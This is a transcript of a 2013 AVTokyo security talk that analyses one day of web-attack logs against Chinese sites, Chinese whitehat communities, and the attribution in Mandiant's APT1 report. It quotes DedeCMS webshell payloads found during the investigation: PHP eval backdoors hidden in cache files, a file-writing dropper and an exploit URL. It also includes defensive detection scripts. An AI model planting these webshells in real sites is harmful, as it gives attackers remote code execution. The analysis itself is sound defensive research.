avtokyo 2013.5 - china is a victim, too :-) (english version)

China is a victim, too :) (AVTokyo Special Edition) Darkfloyd x Zetta, VXRL

Upload: anthony-lai

Post on 28-Nov-2014


DESCRIPTION

Anthony LAI and Zetta KE, Researchers: China is a victim, too :-). China is always taken as an attacker who attacks others; let us take a look at who is attacking China, what kinds of attacks China is suffering from and the possible reasons. Moreover, we would like to take the APT research reports published by other famous agencies, look at how they "deduce" that the attacks come from China, and comment on their "logic". In addition, we have got Knownsec to provide captured and identified Web attack data to VXRL for analysis; hopefully we can get a much clearer picture. Of course, we have a hidden agenda as well. It will be a fun session, so let us enjoy it.

TRANSCRIPT

Page 1: AVTokyo 2013.5 - China is a victim, too :-) (English version)

China is a victim, too :) (AVTokyo Special Edition) Darkfloyd x Zetta, VXRL

Page 2: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Thanks! AVTokyo!

Thank you so much to AVTokyo Panelist

Page 3: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Disclaimer

We are not working for the China or Hong Kong government.

We did not get any funding or money from the Hong Kong and China governments.

Page 4: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Objective

● China is always taken as a proactive attacker; we want to show there is another, flip side of the analysis through:
− Part 1: A single day of Web attack analysis against various web sites in China.
− Part 2: How do you know about vulnerabilities published in China-made software and web sites?
● Media always talks about blackhats in China. How about whitehats in China?
− Part 3: APT1 report counter-comment (from Ran2)

Page 5: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Part 1: A single day of Web attack analysis against various web sites in China.

Page 6: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Research and Analysis

● Knownsec, Beijing shared with VXRL the attack log/data captured by their cloud-based application firewall so that we could carry out the analysis.

● For this talk we have picked 11 Nov, a day for online shopping/e-commerce (Singles' Day, 光棍節) with discounts within Mainland China.

● We will not disclose any victim's IP address or domain name, depending on the criticality or the nature/impact of the attack.

Page 7: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Single's Day ?

Page 8: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Single's Day

Page 9: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Single’s Day as Cyber Monday

http://en.wikipedia.org/wiki/Singles_Day

Page 10: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Research and Analysis

● What do we want to observe and analyze?
− Percentage distribution: attacks from overseas vs attacks from within the country
− What kinds of attacks do the top victims suffer?
− Any top attackers?! What are their favorite payloads and skills?
− What system(s)/platform(s) do the attackers target?
− Any interesting attack payloads?

Page 11: AVTokyo 2013.5 - China is a victim, too :-) (English version)

11 Nov: Attack Traffic Vs Period

Page 12: AVTokyo 2013.5 - China is a victim, too :-) (English version)

11 Nov: Attack Traffic Vs Period:Evening and Night Time

Page 13: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Attack Type Distribution

Attack Type    No. of Requests    Percentage
SCANNER        59101248           91.3447%
LRFI           218753             0.3381%
FILEI          222774             0.3443%
SPECIAL        35838              0.0554%
WEBSHELL       42463              0.0656%
COLLECTOR      4491625            6.9421%
SQLI           274792             0.4247%
XSS            225796             0.3490%
OS_COMMAND     1022               0.0016%
CODE           86140              0.1331%
OTHERS         887                0.0014%
Total          64701338           100.00%

Page 14: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Where are those attackers on e-Shopping Day (11 Nov 2013)?

According to our analysis, 97.5% of the attacks come from IP addresses within China; the remaining 2.5% come from overseas, but that figure includes scanner-type traffic.

Page 15: AVTokyo 2013.5 - China is a victim, too :-) (English version)

How about excluding scanner type?

Country        Attacks
China          1070489
US             18588
Netherlands    5404
Hong Kong      4288
Korea          1823
Turkey         1429
Japan          872

Page 16: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Top 25 Attackers

The top 25 attacking IP addresses are from China, EXCEPT the 24th, which is from the US.

Page 17: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Case Studies: Victim or not?!

Page 18: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Voting for a “Good Guy”

Tou.php – "Tou" means "voting", in Chinese 投

The requests against this site amount to 6.5 GB of data.

In fact, we Chinese are very positive about supporting and promoting "good acts and good guys".

Possibly, it is hard to differentiate the real voters from the robotic ones.

Page 19: AVTokyo 2013.5 - China is a victim, too :-) (English version)

When looking at the traffic, we found attack traffic from Hong Kong.

It abused the X-Forwarded-For header to fake different IP addresses for voting, from 58.64.X.X.
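An added example, not from the slides: given WAF-style request lines for the voting script, it flags a single TCP peer cycling through many X-Forwarded-For values and tallies votes by the address that can actually be trusted. The log line format, the sample lines and the trusted-proxy list are all constructed assumptions.

```python
from collections import defaultdict

# Constructed sample log (assumed format: peer IP, X-Forwarded-For value or
# "-", method, path). One peer in 58.64.0.0/16 rotates the header on every
# request; two ordinary voters follow.
SAMPLE_LOG = """\
58.64.1.10 10.0.0.1 POST /tou.php
58.64.1.10 10.0.0.2 POST /tou.php
58.64.1.10 10.0.0.3 POST /tou.php
58.64.1.10 10.0.0.4 POST /tou.php
58.64.1.10 10.0.0.5 POST /tou.php
58.64.1.10 10.0.0.6 POST /tou.php
203.0.113.5 - POST /tou.php
198.51.100.9 203.0.113.7 POST /tou.php
"""

# Reverse proxies whose X-Forwarded-For we are allowed to believe (assumed).
TRUSTED_PROXIES = {"198.51.100.9"}


def parse_line(line):
    """Split one constructed log line into (peer, xff, method, path)."""
    peer, xff, method, path = line.split()
    return peer, xff, method, path


def vote_source(peer, xff, trusted=TRUSTED_PROXIES):
    """Decide which address a vote should be counted against.

    X-Forwarded-For is just a request header: any client can set it. It is
    only meaningful when the TCP peer is a proxy we operate, and even then
    only the right-most entry (the one that proxy appended) is trustworthy.
    """
    if peer in trusted and xff != "-":
        return xff.split(",")[-1].strip()
    return peer


def find_header_rotation(log_text, path="/tou.php", min_distinct=5):
    """Return {peer: distinct XFF count} for peers that sent at least
    `min_distinct` different X-Forwarded-For values to `path`."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        peer, xff, _method, req_path = parse_line(line)
        if req_path == path and xff != "-":
            seen[peer].add(xff)
    return {p: len(v) for p, v in seen.items() if len(v) >= min_distinct}


def count_votes(log_text, path="/tou.php"):
    """Tally votes per real source, ignoring forged headers."""
    tally = defaultdict(int)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        peer, xff, _method, req_path = parse_line(line)
        if req_path == path:
            tally[vote_source(peer, xff)] += 1
    return dict(tally)


if __name__ == "__main__":
    print("peers rotating X-Forwarded-For:", find_header_rotation(SAMPLE_LOG))
    print("votes by trusted source:", count_votes(SAMPLE_LOG))
```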

Page 20: AVTokyo 2013.5 - China is a victim, too :-) (English version)

My favorite ISP :)

Page 21: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Hey, it is 11 Nov (Single's day) for Shopping!

We found attacks against a "group purchase" web site: 47 attempts to access the site's order information via the old, classic OS command injection attack.

Page 22: AVTokyo 2013.5 - China is a victim, too :-) (English version)

How about those overseas attackers?

Where are they?

Country      IP
China        116.252.224.162
US           173.208.240.190
Korea        119.70.29.137
Hong Kong    58.64.205.27
Thailand     110.34.230.226
Taiwan       118.233.66.105
Japan        202.89.232.79

Page 23: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Observation: Any interesting attack payload from overseas?

From the US?! Using a Chinese Python Layer-7 DDoS script?! :) (from 00:00 to 23:59)

Page 24: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Observation: China Tools, IP address from US :)

http://www.dklkt.cn/article.asp?id=233

Page 25: AVTokyo 2013.5 - China is a victim, too :-) (English version)

How about attack traffic from US?

Page 26: AVTokyo 2013.5 - China is a victim, too :-) (English version)

How about attack traffic from US?

• Scanning and exploiting particular recently released vulnerabilities in CMSs.

• We will discuss it in more detail later.

• Targeting forums and CMSs.

Page 27: AVTokyo 2013.5 - China is a victim, too :-) (English version)

How about attack traffic from JP?

Page 28: AVTokyo 2013.5 - China is a victim, too :-) (English version)

How about attack traffic from JP?

Nothing special: only casual downloads, traffic necessarily from scanners.

Interestingly, webscan.360.cn uses a JP IP address to scan hosts in China.

Page 29: AVTokyo 2013.5 - China is a victim, too :-) (English version)

How about attack traffic from KR?

Nothing special: only casual downloads, not necessarily from scanners.

315online.com.cn - An Anti-Online Fraud Portal

Page 30: AVTokyo 2013.5 - China is a victim, too :-) (English version)

How about attack traffic from TW and TH?

Typical scanner traffic, nothing special.

Page 31: AVTokyo 2013.5 - China is a victim, too :-) (English version)

How about attack traffic from Netherland?

Scanning a WordPress-like site in China.

Page 32: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Observation: Special Payloads against victims

● <URL>/plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B

● Creates a webshell backdoor under DedeCMS.
● Against DedeCMS? I am kidding; there are lots of other victims suffering from this kind of vuln: http://www.wooyun.org/searchbug.php?q=dedecms

Page 33: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Dedecms (China-made CMS)

Page 34: AVTokyo 2013.5 - China is a victim, too :-) (English version)
Page 35: AVTokyo 2013.5 - China is a victim, too :-) (English version)

DedeCMS

Page 36: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Reference: DedeCMS Exploit

Interesting technique to hide the webshell: put it like a cache file.
http://www.nxadmin.com/penetration/1168.html
http://blog.csdn.net/seoyundu/article/details/12855759

/plus/download.php exploit - Inject Webshell
http://www.xiaosedi.com/post/dedecms_exp_01.html

/plus/search.php exploit - Inject Webshell
http://eoo.hk/oswork/28.htm

DedeCMS backdoor killer from Anquan.org
http://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_278959.shtml

Page 37: AVTokyo 2013.5 - China is a victim, too :-) (English version)

As you may have found 90sec.php in the log, there is an .inc file with this statement:

{dede:php}file_put_contents('90sec.php','<?php eval($_POST[guige]);?>');{/dede:php}

However, no such file is found in the folder. Why? Under the data/cache folder, several htm files (myad-1.htm, myad-16.htm, mytag-1208.htm) are found with the following code:

<!--
document.write("dedecmsisok<?php @eval($_POST[cmd]);?>");
-->

<!--
document.write("<?php $fp = @fopen('av.php', 'a');@fwrite($fp, '<?php eval($_POST[110]) ?>axxxxx');echo 'OK';@fclose($fp);?>");
-->

<!--
document.write("<?php echo 'dedecms 5.7 0day<br>guige, 90sec.org';@preg_replace('/[copyright]/e',$_REQUEST['guige'],'error');?>");
-->

Page 38: AVTokyo 2013.5 - China is a victim, too :-) (English version)

It is strange that an .htm page could be taken as a webshell; the idea is that those htm files are included and generated by another PHP file. After checking, we figured out which one: plus/mytag_js.php

Page 39: AVTokyo 2013.5 - China is a victim, too :-) (English version)

The backdoor webshell is triggered with the following URLs by passing in various ID values, WITHOUT being detected by the scanner:

http://www.nxadmin.com/plus/mytag_js.php?id=1208

http://www.nxadmin.com/plus/ad_js.php?id=1

Reference:http://www.nxadmin.com/penetration/1168.html
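One way a defender can sweep a DedeCMS data/cache directory for the pattern described on the previous slides (PHP open tags, eval() of request data, preg_replace() with the /e modifier, or .php file writes smuggled into .htm "cache" files), written here as an added example and not taken from the slides or the referenced posts. The sample files are constructed, with the backdoor sample modelled on the mytag-1208.htm content shown above.

```python
import os
import re
from tempfile import TemporaryDirectory

# Signatures drawn from the cache files shown above: a PHP open tag inside a
# file that should be static HTML, eval() of request data, preg_replace()
# with the /e (eval) modifier, and writes of new .php files.
PHP_TAG = re.compile(r"<\?php", re.IGNORECASE)
DANGEROUS = re.compile(
    r"@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)"
    r"|preg_replace\s*\(\s*['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]"
    r"|file_put_contents\s*\(\s*['\"][^'\"]+\.php",
    re.IGNORECASE,
)


def scan_text(text):
    """Return the reasons `text` looks like a webshell hidden in a cache file."""
    reasons = []
    if PHP_TAG.search(text):
        reasons.append("php tag in non-php file")
    match = DANGEROUS.search(text)
    if match:
        reasons.append("dangerous call: " + match.group(0))
    return reasons


def scan_cache_dir(cache_dir):
    """Walk a data/cache tree and map each suspicious .htm/.html/.inc file
    (path relative to cache_dir) to the reasons it was flagged."""
    findings = {}
    for root, _dirs, files in os.walk(cache_dir):
        for name in files:
            if not name.lower().endswith((".htm", ".html", ".inc")):
                continue
            full = os.path.join(root, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                reasons = scan_text(fh.read())
            if reasons:
                findings[os.path.relpath(full, cache_dir)] = reasons
    return findings


# Constructed samples: a harmless ad snippet, a file modelled on the
# mytag-1208.htm shown above, and the .inc statement that drops 90sec.php.
BENIGN = "<!--\ndocument.write(\"<a href='/promo'>Singles' Day sale</a>\");\n-->\n"
BACKDOOR = "<!--\ndocument.write(\"dedecmsisok<?php @eval($_POST[cmd]);?>\");\n-->\n"
DROPPER = "{dede:php}file_put_contents('90sec.php','<?php eval($_POST[guige]);?>');{/dede:php}"


def demo():
    """Write the samples into a temporary cache dir and scan it."""
    with TemporaryDirectory() as cache_dir:
        for name, body in (("myad-1.htm", BENIGN), ("mytag-1208.htm", BACKDOOR)):
            with open(os.path.join(cache_dir, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_cache_dir(cache_dir)


if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```

Pair the sweep with a review of plus/mytag_js.php and plus/ad_js.php, since those are the includers that turn a flagged cache file into executable PHP.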

Page 40: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Part 2: Organizations with China Whitehats

Page 41: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Whitehats in China

Wooyun: Bugs published in China

● The idea is the same as CVE/MITRE but more informative and organized
● Vendor neutral
● Public and open
● Promotes the Whitehats community (http://www.wooyun.org/whitehats/)

Page 42: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Observation #1: CMS bugs everywhere (after Google Translate)

http://www.wooyun.org/bug.php?action=list&subtype=52

Page 43: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Observation #2: Even when some Whitehats reported the vulns…

● A Whitehat reported a high-risk vuln. to 360, but 360 said: Ignored it!
● My comment: WTF!

Page 44: AVTokyo 2013.5 - China is a victim, too :-) (English version)
Page 45: AVTokyo 2013.5 - China is a victim, too :-) (English version)
Page 46: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Consistently ignores high and medium level vulns. (highlighted in yellow)

http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360

Page 47: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Observation #3: Positive rewards from vendors and promotion of whitehats

Page 48: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Zoomeye (www.zoomeye.org)

Page 49: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Whitehats in China: Anquan.org (a Safety Alliance among various software and security product vendors)

● With 800 vendors
● Vendor neutral
● A platform for the public to report any infringement, privacy violation, phishing attack, etc.
● http://www.anquan.org/help/aboutus/authen/

Page 50: AVTokyo 2013.5 - China is a victim, too :-) (English version)

If time permits…

Part 3: APT1 Report – Counter Comment from Ran2, VXRL

Page 51: AVTokyo 2013.5 - China is a victim, too :-) (English version)

APT1 Report: Counter Comment

● Has anyone read the Mandiant APT1 Report?
● Analysis was done by Ran2, Researcher, VXRL.
● Mandiant deduced the attack against the US from China PLA Team #61389 with the following deduction:
− Attacker profiling via his password
− Posts in the forum

Page 52: AVTokyo 2013.5 - China is a victim, too :-) (English version)

APT1 Report from Mandiant

● On 18 February 2013, Mandiant, released an unprecedented report – “APT1: Exposing One of China’s Cyber Espionage Units”. Mandiant claims that they have identified evidence linking an APT attack group, APT1 (aka Comment Crew) to the Military Cover Designator 61398 of the People’s Liberation Army (PLA).

Page 53: AVTokyo 2013.5 - China is a victim, too :-) (English version)

APT1 Report from Mandiant

● Chinese officials have vigorously denied any link to the APT activities in Mandiant's accusations.

● Some commentaries said: "Clearly, Mandiant caught Beijing's hands in the cookie jar".

● However, some other responses from skeptics said that the evidence produced by Mandiant did not include any alternative conclusion other than pointing at China, or that the so-called PLA hacking lacks convincing evidence.

Page 54: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Clarification #1: Attacker Profiling

● "APT1 is not a ghost in a digital machine", Mandiant claims; they had identified a select number of APT1 personas. On page 51 of the APT1 Report, they provided hints on how they perform the persona profiling, basically by data mining of:
− the authors of APT1's digital weapons (i.e. the malware)
− the registrants of APT1 FQDNs (aka FQDN profiling)
− the email accounts (on public social websites)
− the registration records of leaked hackers' accounts, Rootkit.com

Page 55: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Clarification #1: Attacker Profiling

● Based on the profiling results, Mandiant believed that these three personas were based in Shanghai, responsible for authoring the malware and for preparing and launching the APT1 attacks, and that they are working for the PLA.

● UglyGorilla (UG) is the key persona identified that leads to the above conclusion.

Page 56: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Clarification #1: Attacker Profiling

● Searching further on the Internet, I also found Jack Wang's postings in a China military forum. However, I discovered that he (UglyGorilla, or Jack Wang) actually posted 15 messages, of which only 2 are related to cyber war; all the other topics include conventional warfare and even bio-chemical warfare. He even posted to the forum that he was a military warfare lover, but did not mention being a soldier himself. I think this piece of information should also have been disclosed in the APT1 Report.

Page 57: AVTokyo 2013.5 - China is a victim, too :-) (English version)
Page 58: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Clarification #1: Attacker Profiling

● Even though we have a high chance of proving that UglyGorilla is Jack Wang or Wang Dong, the author of the APT1 malware, I don't find hard proof that he is a China soldier or serving in PLA Unit 61398. The only link I can find is his posting in the Chinese military forum, but on the contrary he also said he was only a military lover.

Page 59: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Clarification #1: Attacker Profiling

Similar to UglyGorilla, the APT1 Report identified another persona, DOTA. Based on a captured video, which I guess was gathered from an RDP connection on the monitored hop, DOTA was once observed registering email accounts.

Page 60: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Clarification #1: Attacker Profiling

● It is clear proof that DOTA was using a Shanghai telephone number and that he is fluent in English when communicating with other parties. I believe DOTA's password "2j3c1k" may mean 二局三处一科 (2nd Bureau, 3rd Division, 1st Section),

● but we cannot rule out that it bears other meanings, such as 二鸡三吃一刻, "the moment of cooking 2 chickens in three different ways".

Page 61: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Clarification #1: Attacker Profiling

● Yes, it is interesting and there are lots of ways to interpret the simple characters in Chinese.

● I am not trying to find an exit for the accusation, but I would like to see more solid evidence pointing the fingers to the PLA Unit 61398 as APT1.

Page 62: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Clarification #2: Infrastructure, Remote Desktop Sessions

● On page 4, Mandiant mentioned that "1,849 of the 1,905 sessions were observed using the keyboard layout 'Chinese (Simplified) – US Keyboard'", and they assumed that the attackers used a Chinese version of Microsoft Windows. Because the attackers are using a Chinese version of the Microsoft OS, Mandiant implies that APT1 are Mainland Chinese speakers.

Page 63: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Clarification #2: Infrastructure, Remote Desktop Sessions

● Based on the RDP protocol documentation from Microsoft, I found that the RDP client sends its keyboard layout as a 4-byte field to the RDP server (the victim or hop, in our case). If a network sniffer is installed on the RDP server, we can collect this piece of digital evidence. If the attackers used "Chinese (Simplified) – US Keyboard", on the recipient side we can locate the 4-byte value 0x0804 in the network packets.
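As an added example (not from the slides or Ran2's report), the Python below pulls the keyboardLayout field out of the Client Core Data block (TS_UD_CS_CORE) described in MS-RDPBCGR section 2.2.1.3.2 and labels the language identifier; it assumes the GCC user data has already been extracted from the MCS Connect Initial PDU of a capture, and the block builder and sample bytes are constructed, not a real capture.

```python
import struct

# TS_UD_CS_CORE layout per MS-RDPBCGR 2.2.1.3.2 (all little-endian):
#   header.type(2)=0xC001, header.length(2), version(4), desktopWidth(2),
#   desktopHeight(2), colorDepth(2), SASSequence(2), keyboardLayout(4), ...
CS_CORE = 0xC001
KEYBOARD_LAYOUT_OFFSET = 16  # bytes from the start of the block header

# A few Windows language identifiers (low 16 bits of keyboardLayout).
LANG_IDS = {
    0x0804: "Chinese (Simplified, PRC)",
    0x0404: "Chinese (Traditional, Taiwan)",
    0x0C04: "Chinese (Hong Kong SAR)",
    0x0409: "English (United States)",
    0x0411: "Japanese",
    0x0412: "Korean",
}


def iter_user_data(blob):
    """Yield (type, block) for each TS_UD_HEADER-prefixed block in `blob`."""
    off = 0
    while off + 4 <= len(blob):
        utype, ulen = struct.unpack_from("<HH", blob, off)
        if ulen < 4 or off + ulen > len(blob):
            break  # truncated or corrupt length: stop rather than misparse
        yield utype, blob[off:off + ulen]
        off += ulen


def keyboard_layout(blob):
    """Return the 32-bit keyboardLayout from the Client Core Data, or None."""
    for utype, block in iter_user_data(blob):
        if utype == CS_CORE and len(block) >= KEYBOARD_LAYOUT_OFFSET + 4:
            return struct.unpack_from("<I", block, KEYBOARD_LAYOUT_OFFSET)[0]
    return None


def describe_layout(layout):
    """Render the value the way an analyst would note it in a report."""
    lang = LANG_IDS.get(layout & 0xFFFF)
    return "%#010x (%s)" % (layout, lang or "unknown language id")


def build_cs_core(layout, client_name="WIN-TEST"):
    """Constructed minimal TS_UD_CS_CORE (version, 1024x768, depth,
    SAS sequence, layout, build, 32-byte UTF-16 clientName) for testing."""
    body = struct.pack("<IHHHHII", 0x00080004, 1024, 768, 0xCA01, 0xAA03, layout, 2600)
    body += client_name.encode("utf-16-le").ljust(32, b"\0")
    return struct.pack("<HH", CS_CORE, 4 + len(body)) + body


# Constructed sample: a dummy user-data block followed by a core block whose
# client claims the zh-CN layout (0x0804), the value discussed above.
SAMPLE_USER_DATA = struct.pack("<HH", 0xC004, 8) + b"\0" * 4 + build_cs_core(0x0804)

if __name__ == "__main__":
    # The layout is whatever the client chose to send, so treat it as a
    # claim made by the attacker's tooling, not as proof of the OS language.
    print(describe_layout(keyboard_layout(SAMPLE_USER_DATA)))
```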

Page 64: AVTokyo 2013.5 - China is a victim, too :-) (English version)
Page 65: AVTokyo 2013.5 - China is a victim, too :-) (English version)

More details from APT1 Counter Comment Report

− http://espionageware.blogspot.hk/

Page 66: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Summary

● Interesting payloads and practices against China sites are shown.

● Web attacks from overseas against China on 11 Nov (a day with a high volume of e-commerce and online shopping) are not the majority.

● The majority of the traffic is crawlers and scanners; other than that, the majority of attacks are SQLi.

● There are lots of attacks against CMS systems in China.

● There are whitehat non-profit organizations, including Wooyun.org and Anquan.org, helping the China security community.

Page 67: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Summary

● Expect technical and/or journalistic reports with more reasonable deduction, sufficient proof and scientific analysis.

● We hope to see more balanced views and analysis reports, not just labeling China as the only cyberwar actor in this party.

● We hope to see fairer comment that also talks about the positive side of security in China.

● Selling products and solutions is easy by giving a false sense of "threat"; however, as a researcher, please keep your ethics high and your mindset clear. We are researchers and scientists, not opportunists.

Page 68: AVTokyo 2013.5 - China is a victim, too :-) (English version)

Thanks! Thank you so much :)

Respect and appreciation to Zetta and Ran2 for their work, analysis and time.

Highly Appreciate the attack log shared by Knownsec for research purpose.
